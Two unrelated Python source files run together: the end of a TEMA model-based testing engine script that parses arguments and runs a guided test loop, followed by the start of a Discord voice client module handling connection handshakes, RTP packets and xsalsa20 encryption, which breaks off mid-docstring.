IN THE SOFTWARE. """ Commandline arguments (example): model: REQUIRED test model specification (lstsmodel or parallellstsmodel) coverage: REQUIRED coverage module Note: If not given, the proper coverage module is guessed based on the coveragereq string. (for backwards compatibility) coveragereq: REQUIRED coverage requirement in a language accepted by the coverage module. coveragereq-args: arguments for coverage module initmodels: models for initialising a test run. These models are executed before the execution of the main test model is started. testdata: datafiles that should be used in testing. $(expression)$ in the transition labels of models will be replaced using the data. Use 'nodata' to disable testdata guidance & guidance-args: test selection module and its arguments adapter & adapter-args: test adapter (socketserveradapter and its arguments) and its arguments logger & logger-args: logger module and its arguments actionpp & actionpp-args: action name postprocessor through which the actions are passed just before being sent to the adapter. verify-states: 1: always executes all the encountered state verifications 0 (default): no special treatment to state verifications testengine --model=parallellstsmodel:gallerycalendar.pcrules \\ --coverage='clparser' \\ --coveragereq='actions .*fullscreen.*' \\ --initmodels='lstsmodel:close-apps.lsts,parallellstsmodel:initmodel.pcrules'\\ --testdata='file:calendardata.td,file:gallerydata.td' \\ --guidance=gameguidance \\ --guidance-args='lookahead:15,randomseed:42' \\ --adapter=socketserveradapter \\ --adapter-args='port:9090' \\ --logger='fdlogger' --logger-args='targetfd:stdout,exclude:ParallelLstsModel' --actionpp='localspp' --actionpp-args='file:S60v3localization.csv,lang:fi' --stop-after=1h30m """ import sys import getopt import random import os import time import threading import re import signal import traceback # Save pid run_pid = file("__engine_pid", "w") print >> run_pid, os.getpid() run_pid.close() # Commandline arguments: ARG_MODEL="model" ARG_COVERAGE="coverage" ARG_COVERAGE_REQ="coveragereq" # A better name for this arg might be # 'coverage-args' instead of 'coveragereq-args' # but sticking by this for now for backwards compatibility. ARG_COVERAGE_ARGS="coveragereq-args" ARG_INITMODELS="initmodels" ARG_DATA="testdata" ARG_GUIDANCE="guidance" ARG_GUIDANCE_ARGS="guidance-args" ARG_CONF_FILE="config" ARG_ADAPTER="adapter" ARG_ADAPTER_ARGS="adapter-args" ARG_LOGGER="logger" ARG_LOGGER_ARGS="logger-args" ARG_ACTIONPP="actionpp" # Actionname post-processor ARG_ACTIONPP_ARGS="actionpp-args" ARG_STOP_AFTER="stop-after" ARG_VERIFY_STATES="verify-states" CMDLINE_ARGUMENTS=[ "%s" % a for a in (ARG_MODEL, ARG_DATA, ARG_COVERAGE, ARG_COVERAGE_ARGS, ARG_COVERAGE_REQ, ARG_INITMODELS, ARG_CONF_FILE, ARG_GUIDANCE, ARG_GUIDANCE_ARGS, ARG_ADAPTER, ARG_ADAPTER_ARGS, ARG_LOGGER, ARG_LOGGER_ARGS, ARG_ACTIONPP, ARG_ACTIONPP_ARGS, ARG_STOP_AFTER, ARG_VERIFY_STATES) ] # arguments without default values are required in the command line CMDLINE_DEFAULTS={ ARG_COVERAGE: "", ARG_COVERAGE_ARGS: "", ARG_CONF_FILE: "", ARG_DATA: "", ARG_INITMODELS: "", ARG_GUIDANCE: "gameguidance", ARG_GUIDANCE_ARGS: "", ARG_ADAPTER: "socketserveradapter", ARG_ADAPTER_ARGS: "port:9090", ARG_LOGGER: "fdlogger", ARG_LOGGER_ARGS: "targetfd:stdout", ARG_ACTIONPP: "", ARG_ACTIONPP_ARGS: "", ARG_STOP_AFTER: "", ARG_VERIFY_STATES: "0" } def error(errmsg,errcode=1): sys.stderr.write("%s: ERROR: %s\n" % (sys.argv[0],errmsg)) sys.exit(errcode) def print_traceback(fileobject=sys.stderr): # At the moment print only same traceback that we would get, if we # hadn't caught the exception. type,value,traceb = sys.exc_info() traceback.print_exception(type,value,traceb,file=fileobject) class CallGuidance: def __init__(self, guidance_object, current_state): self.__object = guidance_object self.__from_here = current_state self.__ev = threading.Event() self.__ev.clear() self.__rval = [] self.__ok = False def __call__(self): try: self.__rval[:] = [ self.__object.suggestAction(self.__from_here) ] self.__ok = True finally: self.__ev.set() def wait_value(self, limit): wait_time = None if limit > 0 : wait_time = limit - time.time() self.__ev.wait( wait_time ) if self.__ok : return self.__rval[0] else: raise SystemExit class TestEngine: """This one-method class is a class instead of a pure function because we want to use the same logging mechanism as in other classes: log method is plugged in by the Logger.listen method.""" def set_stop_time(self, timestr): # Determine time zone offset to UTC if time.localtime().tm_isdst: timezone = -time.altzone / 60 / 60.0 else: timezone = -time.timezone / 60 / 60.0 if timezone >= 0: timeoffset = "+" + str(timezone) else: timeoffset = str(timezone) self.log("Local time zone UTC%s" % timeoffset ) if timestr!="": if 'h' in timestr: hours, timestr = timestr.split('h') else: hours = 0 if 'm' in timestr: mins, timestr = timestr.split('m') else: mins = 0 if 's' in timestr: secs, timestr = timestr.split('s') else: secs = 0 try: if timestr: raise Exception("Extra characters after seconds.") hours, mins, secs = int(hours), int(mins), int(secs) except Exception, e: self.log("Syntax error in stop time, use format 1h30m50s") raise Exception("Invalid time format.") self._stop_time = time.time() + secs + 60*mins + 3600*hours self.log("Test run will be stopped at %s" % time.strftime("%F %T",time.localtime(self._stop_time))) else: self._stop_time = 0.0 def run_test(self,testmodel,current_state,covreq,testdata,guidance,adapter,appchain,verifier=None): # FIXME: Should this be a class method? def handler(signum,frame): raise Exception("Signal %i received" % signum ) # Signals we are catching signal.signal(signal.SIGTERM,handler) stepcounter=0 # clean model cache after every 10000 executions. # some guidances may clean up the cache themselves # but even if they don't, make sure it's cleared once in a while # to avoid consuming too much memory. cacheClearanceInterval = 10000 executionsSinceCacheClearange = 0 self.log("Testing starts from state %s" % current_state) while (self._stop_time == 0.0 or time.time() < self._stop_time) and covreq.getPercentage()<1.0 and len(current_state.getOutTransitions())>0: stepcounter+=1 # 1. Choose action to be executed # If verifier is set and it gives an action, we'll execute that. # Otherwise, guidance chooses the action to be executed. if verifier: verifying_action = verifier.getAction(current_state) else: verifying_action = None if verifying_action is None: if guidance.isThreadable(): guid = CallGuidance(guidance, current_state) t = threading.Thread(target=guid) t.setDaemon(True) t.start() try: suggested_action = guid.wait_value(self._stop_time) except SystemExit: break else: suggested_action=guidance.suggestAction(current_state) else: suggested_action = verifying_action self.log("Step : %5i Covered: %7.4f %% Next: %s" % \ (stepcounter,covreq.getPercentage()*100.0,suggested_action)) # 2. Evaluate testdata, communicate with the SUT, if necessary if suggested_action.isKeyword(): # Keywords cause communication try: # force keyword to be positive (without '~') # before sending if suggested_action.isNegative(): sent_action_name=suggested_action.negate() else: sent_action_name=suggested_action.toString() #adapter._set_current_state_UGLY_HACK(current_state) result=adapter.sendInput( appchain.process( testdata.processAction(sent_action_name))) except AdapterError,e: self.log("Adapter error, cannot continue: %s" % e) return "Adapter error: %s" % e if suggested_action.isNegative(): if result==True: executed_action_name=suggested_action.negate() else: executed_action_name=suggested_action.toString() else: if result==True: executed_action_name=suggested_action.toString() else: executed_action_name=suggested_action.negate() else: # Action is not a keyword => no communication executed_action_name=suggested_action.toString() testdata.processAction(executed_action_name) # 3. Check that we can execute executed_action_name also in # the model possible_transitions=[ t for t in current_state.getOutTransitions() \ if t.getAction().toString()==executed_action_name ] # TBD: the line above seems/seemed to not find any actions sometimes # (when there's only the ~ version of the action possible?) ?? # would this line be better?? #possible_transitions=[ t for t in current_state.getOutTransitions() \ # if t.getAction().toString()==str(suggested_action)] if possible_transitions==[]: # Model can not execute the required action => # *** error found *** self.log("Error found: cannot execute '%s' in the model" % executed_action_name) try: if hasattr(adapter,"errorFound"): adapter.errorFound() except AdapterError,e: self.log("Adapter error when it was being informed about an error: %s" % e) self.log("Shutting down the adapter") try: adapter.stop() except AdapterError,e: self.log("Adapter error when tried to quit the connection: %s" % e) self.log("Verdict: FAIL") return "Error found: cannot execute '%s' in model state %s." % \ (executed_action_name,current_state) # 4. Execute the transition (if many, print warning on nondeterminism) chosen_transition=random.choice(possible_transitions) if len(possible_transitions)>1: print "Non determinism:",[str(t) for t in possible_transitions] self.log("Executing: %s" % chosen_transition.getAction()) self.log("New state: %s" % chosen_transition.getDestState()) # print stateprops only for every start_aw because there a so many # of them and printing them in every point would bloat the log... if "start_aw" in str(chosen_transition): self.log("(Non-SleepState) StateProps: %s" % " ".join(['"%s"'%s for s in chosen_transition.getDestState().getStateProps() if "SleepState" not in str(s)] )) guidance.markExecuted(chosen_transition) if verifier: verifier.markExecuted(chosen_transition) current_state=chosen_transition.getDestState() executionsSinceCacheClearange += 1 if executionsSinceCacheClearange >= cacheClearanceInterval: testmodel.clearCache() executionsSinceCacheClearange = 0 # 5. Then loop. # Out of loop... result_comment="____ Undefined ____" if (self._stop_time > 0.0 and time.time() > self._stop_time): self.log("Time to stop") self.log("Verdict: PASS") result_comment = "Time to stop." elif covreq.getPercentage()<1.0: self.log("Cannot continue from state %s, no outgoing transitions." % current_state) # self.log("Verdict: INCONCLUSIVE") result_comment = "Deadlock reached in the test model." else: self.log("Required coverage acquired") self.log("Verdict: PASS") result_comment = "Coverage requirement fulfilled." self.log("Shutting down the adapter") try: adapter.stop() except AdapterError,e: self.log("Adapter error when tried to quit the connection: %s" % e) return result_comment class ArgumentError (Exception): pass def parse_arguments(arglist): """returns argument-value pairs in dictionary""" try: optlist,rest=getopt.getopt(arglist, [], [ "%s=" % a for a in CMDLINE_ARGUMENTS ]) if rest!=[]: raise ArgumentError("Unable to parse argument '%s'" % str(rest[0])) retval={} retval.update(CMDLINE_DEFAULTS) for k,v in optlist: retval[k[2:]]=v # remove '--' in front of the option name # require that every argument has a value (either default or explicit) for k in CMDLINE_ARGUMENTS: if not k in retval: raise ArgumentError("Missing argument: --%s" % k) return retval except getopt.GetoptError,e: raise ArgumentError(e) def import_tema_modules(options): # the following classes will be imported from libraries: global InitEngine, Model, Guidance, CoverageRequirement, TestData, Adapter, AdapterError, Logger # LastNameValue object will receive test model type and file name class LastNameValue: def setParameter(self,name,value): self.name,self.value=name,value try: from tema.initengine.initengine import InitEngine if options[ARG_COVERAGE]: # if coverage param given, import that coverage module coveragemodule=__import__("tema.coverage."+ options[ARG_COVERAGE], globals(),locals(),['']) CoverageRequirement = coveragemodule.requirement elif options[ARG_COVERAGE_REQ]: # otherwise, guess the coverage module from the coverage req string reqStr = options[ARG_COVERAGE_REQ].strip() if reqStr.startswith("action"): from tema.coverage.clparser import requirement\ as CoverageRequirement elif reqStr.startswith("findnew"): from tema.coverage.findnewcoverage import requirement\ as CoverageRequirement else: from tema.coverage.altercoverage import requirement\ as CoverageRequirement else: # Neither coverage or coverage-req given. # Use dummy coverage module which shows always zero percentage. from tema.coverage.dummycoverage import CoverageRequirement if options[ARG_DATA] == "nodata" : from tema.data.nodata import TestData else: from tema.data.testdata import TestData # imported model module depends on the parameters... nv=LastNameValue() set_parameters(nv,options[ARG_MODEL]) # now nv.name = model module name, nv.value = model file name modelmodule=__import__("tema.model."+nv.name,globals(),locals(),['']) Model=modelmodule.Model Model.ARG_source_file=nv.value # Model will be loaded from source_file # imported guidance depends on the parameters... guidancemodule=__import__("tema.guidance."+options[ARG_GUIDANCE],globals(),locals(),['']) Guidance=guidancemodule.Guidance # imported adapter depends on the parameters... adaptermodule=__import__("tema.adapter."+options[ARG_ADAPTER],globals(),locals(),['']) Adapter=adaptermodule.Adapter AdapterError=adaptermodule.AdapterError # imported logger depends on the parameters... loggermodule=__import__("tema.logger."+options[ARG_LOGGER],globals(),locals(),['']) Logger=loggermodule.Logger except ImportError, e: error("import failed: '%s'. Is TemaLib in PYTHONPATH?" % e) except Exception, e: error("import failed: '%s'." % e) def set_parameters(object,argument_string): """Parse argument string and call setParameter-method of the object accordingly. For example argument string 'port:9090,yellowflag,logger:adapterlog' implies calls setParameter('port',9090), setParameter('yellowflag',None), setParameter('logger',adapterlog_object).""" # TODO: implement special object-type parameters (not needed so far) for argpair in argument_string.split(","): if not argpair: continue if ":" in argpair: name,value=argpair.split(":",1) else: name,value=argpair,None try: object.setParameter(name,int(value)) except Exception,e: if not (isinstance(e,TypeError) or isinstance(e,ValueError)): raise e try: object.setParameter(name,float(value)) except Exception,e: if not (isinstance(e,TypeError) or isinstance(e,ValueError)): raise e object.setParameter(name,value) ### main def main(): try: options=parse_arguments(sys.argv[1:]) except ArgumentError, e: print __doc__ print sys.argv error(e) import_tema_modules(options) # try to optimize try: import psyco psyco.full() except: print "Sadly, there is no Psyco optimization available." # setup logger try: logger=Logger() try: set_parameters(logger,options[ARG_LOGGER_ARGS]) except Exception, e: error("setting up logger arguments failed: '%s'" % e) logger.prepareForRun() # logger seems to be fine. Now assign it to every other class logger.listen(InitEngine) logger.listen(Model) logger.listen(Guidance) logger.listen(Adapter) logger.listen(TestData) logger.listen(CoverageRequirement) logger.listen(TestEngine) # if logging of some classes was excluded, add dummy log methods: for cls in [Model, Guidance, Adapter, CoverageRequirement, TestEngine]: if not hasattr(cls,'log'):cls.log = lambda self,message: None except Exception,e: error("setting up logger failed: '%s'" % e) # Initialize test run try: initengine=InitEngine() set_parameters(initengine,options[ARG_INITMODELS]) except Exception, e: error("setting up initmodel failed: '%s'" % e) # setup test model try: model=Model() model.loadFromFile( file(Model.ARG_source_file) ) initial_state=model.getInitialState() except Exception, e: error("setting up test model failed: '%s'" % e) # setup coverage try: covreq=CoverageRequirement( options[ARG_COVERAGE_REQ], model=model ) except Exception, e: error("reading coverage requirement failed: '%s'" % e) # set covreq arguments (if given) if options[ARG_COVERAGE_ARGS]: try: set_parameters(covreq,options[ARG_COVERAGE_ARGS]) except Exception, e: error("setting covreq arguments failed: '%s'" % e) # Output all the action words to the log for debug, benchmarking # etc. purposes. model.log("Action words: %s" % (" ".join(model.matchedActions([re.compile(".*:end_aw.*")])))) # setup test data try: testdata=TestData() set_parameters(testdata,options[ARG_DATA]) testdata.prepareForRun() except Exception, e: error("setting up test data failed: '%s'" % e) # setup guidance try: guidance=Guidance() try: set_parameters(guidance,options[ARG_GUIDANCE_ARGS]) except Exception, e: error("setting up guidance arguments failed: '%s'" % e) guidance.setTestModel(model) guidance.addRequirement(covreq) guidance.prepareForRun() except Exception, e: if not isinstance(e,SystemExit): error("setting up guidance failed: '%s'" % e) else: raise e # state verifier if int(options[ARG_VERIFY_STATES]): from tema.guidance.stateverifier import StateVerifier verifier = StateVerifier() else: verifier = None # import action postprocessors import tema.actionpp.actionpp appchain=tema.actionpp.actionpp.ActionPPChain() if options[ARG_ACTIONPP]!="": appmodule=__import__("tema.actionpp."+options[ARG_ACTIONPP],globals(),locals(),['']) logger.listen(appmodule.ActionPP) app=appmodule.ActionPP() set_parameters(app,options[ARG_ACTIONPP_ARGS]) appchain.append(app) # setup adapter try: adapter=Adapter() try: set_parameters(adapter,options[ARG_ADAPTER_ARGS]) except Exception, e: error("setting up adapter arguments failed: '%s'" % e) adapter.prepareForRun() except KeyboardInterrupt: sys.exit(1) except Exception, e: if not isinstance(e,SystemExit): error("setting up adapter failed: '%s'" % e) else: raise e try: initengine.run_init(adapter, testdata, appchain) except Exception, e: error("test run initialization failed: '%s'" % e) # Run! te=TestEngine() te.set_stop_time(options[ARG_STOP_AFTER]) result = "" # Catch exceptions so that logger would close the filehandles and write # buffers to disk. try: result=te.run_test(model,initial_state,covreq,testdata,guidance,adapter,appchain,verifier) # We don't want stack trace for normal exit except SystemExit,e: raise # In 2.4, Exception is a base class for all exceptions, but starting with 2.5, BaseException is a base class. # KeyboardInterrupt is inherited from BaseException in 2.5, but in 2.4 from Exception. except KeyboardInterrupt,e: # print_traceback() sys.exit(1) except Exception,e: # print e print_traceback() sys.exit(1) print "Test ended:",result try: main() except Exception,e: print e sys.exit(1)
voice_client.py
""" The MIT License (MIT) Copyright (c) 2015-present Rapptz Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ """Some documentation to refer to: - Our main web socket (mWS) sends opcode 4 with a guild ID and channel ID. - The mWS receives VOICE_STATE_UPDATE and VOICE_SERVER_UPDATE. - We pull the session_id from VOICE_STATE_UPDATE. - We pull the token, endpoint and server_id from VOICE_SERVER_UPDATE. - Then we initiate the voice web socket (vWS) pointing to the endpoint. - We send opcode 0 with the user_id, server_id, session_id and token using the vWS. - The vWS sends back opcode 2 with an ssrc, port, modes(array) and hearbeat_interval. - We send a UDP discovery packet to endpoint:port and receive our IP and our port in LE. - Then we send our IP and port via vWS with opcode 1. - When that's all done, we receive opcode 4 from the vWS. - Finally we can transmit data to endpoint:port. """ import asyncio import socket import logging import struct import threading import select import time from . import opus, utils from .backoff import ExponentialBackoff from .gateway import * from .errors import ClientException, ConnectionClosed from .player import AudioPlayer, AudioSource from .sink import Sink, RawData try: import nacl.secret has_nacl = True except ImportError: has_nacl = False __all__ = ( 'VoiceProtocol', 'VoiceClient', ) log = logging.getLogger(__name__) class VoiceProtocol: """A class that represents the Discord voice protocol. This is an abstract class. The library provides a concrete implementation under :class:`VoiceClient`. This class allows you to implement a protocol to allow for an external method of sending voice, such as Lavalink_ or a native library implementation. These classes are passed to :meth:`abc.Connectable.connect`. .. _Lavalink: https://github.com/freyacodes/Lavalink Parameters ------------ client: :class:`Client` The client (or its subclasses) that started the connection request. channel: :class:`abc.Connectable` The voice channel that is being connected to. """ def __init__(self, client, channel): self.client = client self.channel = channel async def on_voice_state_update(self, data): """|coro| An abstract method that is called when the client's voice state has changed. This corresponds to ``VOICE_STATE_UPDATE``. Parameters ------------ data: :class:`dict` The raw `voice state payload`__. .. _voice_state_update_payload: https://discord.com/developers/docs/resources/voice#voice-state-object __ voice_state_update_payload_ """ raise NotImplementedError async def on_voice_server_update(self, data): """|coro| An abstract method that is called when initially connecting to voice. This corresponds to ``VOICE_SERVER_UPDATE``. Parameters ------------ data: :class:`dict` The raw `voice server update payload`__. .. _voice_server_update_payload: https://discord.com/developers/docs/topics/gateway#voice-server-update-voice-server-update-event-fields __ voice_server_update_payload_ """ raise NotImplementedError async def connect(self, *, timeout, reconnect): """|coro| An abstract method called when the client initiates the connection request. When a connection is requested initially, the library calls the constructor under ``__init__`` and then calls :meth:`connect`. If :meth:`connect` fails at some point then :meth:`disconnect` is called. Within this method, to start the voice connection flow it is recommended to use :meth:`Guild.change_voice_state` to start the flow. After which, :meth:`on_voice_server_update` and :meth:`on_voice_state_update` will be called. The order that these two are called is unspecified. Parameters ------------ timeout: :class:`float` The timeout for the connection. reconnect: :class:`bool` Whether reconnection is expected. """ raise NotImplementedError async def disconnect(self, *, force): """|coro| An abstract method called when the client terminates the connection. See :meth:`cleanup`. Parameters ------------ force: :class:`bool` Whether the disconnection was forced. """ raise NotImplementedError def cleanup(self): """This method *must* be called to ensure proper clean-up during a disconnect. It is advisable to call this from within :meth:`disconnect` when you are completely done with the voice protocol instance. This method removes it from the internal state cache that keeps track of currently alive voice clients. Failure to clean-up will cause subsequent connections to report that it's still connected. """ key_id, _ = self.channel._get_voice_client_key() self.client._connection._remove_voice_client(key_id) class VoiceClient(VoiceProtocol): """Represents a Discord voice connection. You do not create these, you typically get them from e.g. :meth:`VoiceChannel.connect`. Warning -------- In order to use PCM based AudioSources, you must have the opus library installed on your system and loaded through :func:`opus.load_opus`. Otherwise, your AudioSources must be opus encoded (e.g. using :class:`FFmpegOpusAudio`) or the library will not be able to transmit audio. Attributes ----------- session_id: :class:`str` The voice connection session ID. token: :class:`str` The voice connection token. endpoint: :class:`str` The endpoint we are connecting to. channel: :class:`abc.Connectable` The voice channel connected to. loop: :class:`asyncio.AbstractEventLoop` The event loop that the voice client is running on. """ def __init__(self, client, channel): if not has_nacl: raise RuntimeError("PyNaCl library needed in order to use voice") super().__init__(client, channel) state = client._connection self.token = None self.socket = None self.loop = state.loop self._state = state # this will be used in the AudioPlayer thread self._connected = threading.Event() self._handshaking = False self._potentially_reconnecting = False self._voice_state_complete = asyncio.Event() self._voice_server_complete = asyncio.Event() self.mode = None self._connections = 0 self.sequence = 0 self.timestamp = 0 self._runner = None self._player = None self.encoder = None self.decoder = None self._lite_nonce = 0 self.ws = None self.paused = False self.recording = False self.user_timestamps = {} self.sink = None self.starting_time = None self.stopping_time = None warn_nacl = not has_nacl supported_modes = ( 'xsalsa20_poly1305_lite', 'xsalsa20_poly1305_suffix', 'xsalsa20_poly1305', ) @property def guild(self): """Optional[:class:`Guild`]: The guild we're connected to, if applicable.""" return getattr(self.channel, 'guild', None) @property def user(self): """:class:`ClientUser`: The user connected to voice (i.e. ourselves).""" return self._state.user def checked_add(self, attr, value, limit): val = getattr(self, attr) if val + value > limit: setattr(self, attr, 0) else: setattr(self, attr, val + value) # connection related async def on_voice_state_update(self, data): self.session_id = data['session_id'] channel_id = data['channel_id'] if not self._handshaking or self._potentially_reconnecting: # If we're done handshaking then we just need to update ourselves # If we're potentially reconnecting due to a 4014, then we need to differentiate # a channel move and an actual force disconnect if channel_id is None: # We're being disconnected so cleanup await self.disconnect() else: guild = self.guild self.channel = channel_id and guild and guild.get_channel(int(channel_id)) else: self._voice_state_complete.set() async def on_voice_server_update(self, data): if self._voice_server_complete.is_set(): log.info('Ignoring extraneous voice server update.') return self.token = data.get('token') self.server_id = int(data['guild_id']) endpoint = data.get('endpoint') if endpoint is None or self.token is None: log.warning('Awaiting endpoint... This requires waiting. ' \ 'If timeout occurred considering raising the timeout and reconnecting.') return self.endpoint, _, _ = endpoint.rpartition(':') if self.endpoint.startswith('wss://'): # Just in case, strip it off since we're going to add it later self.endpoint = self.endpoint[6:] # This gets set later self.endpoint_ip = None self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.socket.setblocking(False) if not self._handshaking: # If we're not handshaking then we need to terminate our previous connection in the websocket await self.ws.close(4000) return self._voice_server_complete.set() async def voice_connect(self): await self.channel.guild.change_voice_state(channel=self.channel) async def voice_disconnect(self): log.info('The voice handshake is being terminated for Channel ID %s (Guild ID %s)', self.channel.id, self.guild.id) await self.channel.guild.change_voice_state(channel=None) def prepare_handshake(self): self._voice_state_complete.clear() self._voice_server_complete.clear() self._handshaking = True log.info('Starting voice handshake... (connection attempt %d)', self._connections + 1) self._connections += 1 def finish_handshake(self): log.info('Voice handshake complete. Endpoint found %s', self.endpoint) self._handshaking = False self._voice_server_complete.clear() self._voice_state_complete.clear() async def connect_websocket(self): ws = await DiscordVoiceWebSocket.from_client(self) self._connected.clear() while ws.secret_key is None: await ws.poll_event() self._connected.set() return ws async def connect(self, *, reconnect, timeout): log.info('Connecting to voice...') self.timeout = timeout for i in range(5): self.prepare_handshake() # This has to be created before we start the flow. futures = [ self._voice_state_complete.wait(), self._voice_server_complete.wait(), ] # Start the connection flow await self.voice_connect() try: await utils.sane_wait_for(futures, timeout=timeout) except asyncio.TimeoutError: await self.disconnect(force=True) raise self.finish_handshake() try: self.ws = await self.connect_websocket() break except (ConnectionClosed, asyncio.TimeoutError): if reconnect: log.exception('Failed to connect to voice... Retrying...') await asyncio.sleep(1 + i * 2.0) await self.voice_disconnect() continue else: raise if self._runner is None: self._runner = self.loop.create_task(self.poll_voice_ws(reconnect)) async def potential_reconnect(self): # Attempt to stop the player thread from playing early self._connected.clear() self.prepare_handshake() self._potentially_reconnecting = True try: # We only care about VOICE_SERVER_UPDATE since VOICE_STATE_UPDATE can come before we get disconnected await asyncio.wait_for(self._voice_server_complete.wait(), timeout=self.timeout) except asyncio.TimeoutError: self._potentially_reconnecting = False await self.disconnect(force=True) return False self.finish_handshake() self._potentially_reconnecting = False try: self.ws = await self.connect_websocket() except (ConnectionClosed, asyncio.TimeoutError): return False else: return True @property def latency(self): """:class:`float`: Latency between a HEARTBEAT and a HEARTBEAT_ACK in seconds. This could be referred to as the Discord Voice WebSocket latency and is an analogue of user's voice latencies as seen in the Discord client. .. versionadded:: 1.4 """ ws = self.ws return float("inf") if not ws else ws.latency @property def average_latency(self): """:class:`float`: Average of most recent 20 HEARTBEAT latencies in seconds. .. versionadded:: 1.4 """ ws = self.ws return float("inf") if not ws else ws.average_latency async def poll_voice_ws(self, reconnect): backoff = ExponentialBackoff() while True: try: await self.ws.poll_event() except (ConnectionClosed, asyncio.TimeoutError) as exc: if isinstance(exc, ConnectionClosed): # The following close codes are undocumented so I will document them here. # 1000 - normal closure (obviously) # 4014 - voice channel has been deleted. # 4015 - voice server has crashed if exc.code in (1000, 4015): log.info('Disconnecting from voice normally, close code %d.', exc.code) await self.disconnect() break if exc.code == 4014: log.info('Disconnected from voice by force... potentially reconnecting.') successful = await self.potential_reconnect() if not successful: log.info('Reconnect was unsuccessful, disconnecting from voice normally...') await self.disconnect() break else: continue if not reconnect: await self.disconnect() raise retry = backoff.delay() log.exception('Disconnected from voice... Reconnecting in %.2fs.', retry) self._connected.clear() await asyncio.sleep(retry) await self.voice_disconnect() try: await self.connect(reconnect=True, timeout=self.timeout) except asyncio.TimeoutError: # at this point we've retried 5 times... let's continue the loop. log.warning('Could not connect to voice... Retrying...') continue async def disconnect(self, *, force=False): """|coro| Disconnects this voice client from voice. """ if not force and not self.is_connected(): return self.stop() self._connected.clear() try: if self.ws: await self.ws.close() await self.voice_disconnect() finally: self.cleanup() if self.socket: self.socket.close() async def move_to(self, channel): """|coro| Moves you to a different voice channel. Parameters ----------- channel: :class:`abc.Snowflake` The channel to move to. Must be a voice channel. """ await self.channel.guild.change_voice_state(channel=channel) def is_connected(self): """Indicates if the voice client is connected to voice.""" return self._connected.is_set() # audio related def _get_voice_packet(self, data): header = bytearray(12) # Formulate rtp header header[0] = 0x80 header[1] = 0x78 struct.pack_into('>H', header, 2, self.sequence) struct.pack_into('>I', header, 4, self.timestamp) struct.pack_into('>I', header, 8, self.ssrc) encrypt_packet = getattr(self, '_encrypt_' + self.mode) return encrypt_packet(header, data) def _encrypt_xsalsa20_poly1305(self, header, data): box = nacl.secret.SecretBox(bytes(self.secret_key)) nonce = bytearray(24) nonce[:12] = header return header + box.encrypt(bytes(data), bytes(nonce)).ciphertext def _encrypt_xsalsa20_poly1305_suffix(self, header, data): box = nacl.secret.SecretBox(bytes(self.secret_key)) nonce = nacl.utils.random(nacl.secret.SecretBox.NONCE_SIZE) return header + box.encrypt(bytes(data), nonce).ciphertext + nonce def _encrypt_xsalsa20_poly1305_lite(self, header, data): box = nacl.secret.SecretBox(bytes(self.secret_key)) nonce = bytearray(24) nonce[:4] = struct.pack('>I', self._lite_nonce) self.checked_add('_lite_nonce', 1, 4294967295) return header + box.encrypt(bytes(data), bytes(nonce)).ciphertext + nonce[:4] def _decrypt_xsalsa20_poly1305(self, header, data): box = nacl.secret.SecretBox(bytes(self.secret_key)) nonce = bytearray(24) nonce[:12] = header return self.strip_header_ext(box.decrypt(bytes(data), bytes(nonce))) def _decrypt_xsalsa20_poly1305_suffix(self, header, data): box = nacl.secret.SecretBox(bytes(self.secret_key)) nonce_size = nacl.secret.SecretBox.NONCE_SIZE nonce = data[-nonce_size:] return self.strip_header_ext(box.decrypt(bytes(data[:-nonce_size]), nonce)) def _decrypt_xsalsa20_poly1305_lite(self, header, data): box = nacl.secret.SecretBox(bytes(self.secret_key)) nonce = bytearray(24) nonce[:4] = data[-4:] data = data[:-4] return self.strip_header_ext(box.decrypt(bytes(data), bytes(nonce))) @staticmethod def strip_header_ext(data): if data[0] == 0xbe and data[1] == 0xde and len(data) > 4: _, length = struct.unpack_from('>HH', data) offset = 4 + length * 4 data = data[offset:] return data def get_ssrc(self, user_id): return {info['user_id']: ssrc for ssrc, info in self.ws.ssrc_map.items()}[user_id] def play(self, source, *, after=None): """Plays an :class:`AudioSource`. The finalizer, ``after`` is called after the source has been exhausted or an error occurred. If an error happens while the audio player is running, the exception is caught and the audio player is then stopped. If no after callback is passed, any caught exception will be displayed as if it were raised. Parameters ----------- source: :class:`AudioSource` The audio source we're reading from. after: Callable[[:class:`Exception`], Any] The finalizer that is called after the stream is exhausted. This function must have a single parameter, ``error``, that denotes an optional exception that was raised during playing. Raises ------- ClientException Already playing audio or not connected. TypeError Source is not a :class:`AudioSource` or after is not a callable. OpusNotLoaded Source is not opus encoded and opus is not loaded. """ if not self.is_connected(): raise ClientException('Not connected to voice.') if self.is_playing(): raise ClientException('Already playing audio.') if not isinstance(source, AudioSource): raise TypeError(f'source must an AudioSource not {source.__class__.__name__}') if not self.encoder and not source.is_opus(): self.encoder = opus.Encoder() self._player = AudioPlayer(source, self, after=after) self._player.start() def is_playing(self): """Indicates if we're currently playing audio.""" return self._player is not None and self._player.is_playing() def is_paused(self): """Indicates if we're playing audio, but if we're paused.""" return self._player is not None and self._player.is_paused() def stop(self): """Stops playing audio.""" if self._player: self._player.stop() self._player = None def pause(self): """Pauses the audio playing.""" if self._player: self._player.pause() def resume(self): """Resumes the audio playing.""" if self._player: self._player.resume() @property def source(self): """Optional[:class:`AudioSource`]: The audio source being played, if playing. This property can also be used to change the audio source currently being played. """ return self._player.source if self._player else None @source.setter def source(self, value): if not isinstance(value, AudioSource): raise TypeError(f'expected AudioSource not {value.__class__.__name__}.') if self._player is None: raise ValueError('Not playing anything.') self._player._set_source(value) def send_audio_packet(self, data, *, encode=True): """Sends an audio packet composed of the data. You must be connected to play audio. Parameters ---------- data: :class:`bytes` The :term:`py:bytes-like object` denoting PCM or Opus voice data. encode: :class:`bool` Indicates if ``data`` should be encoded into 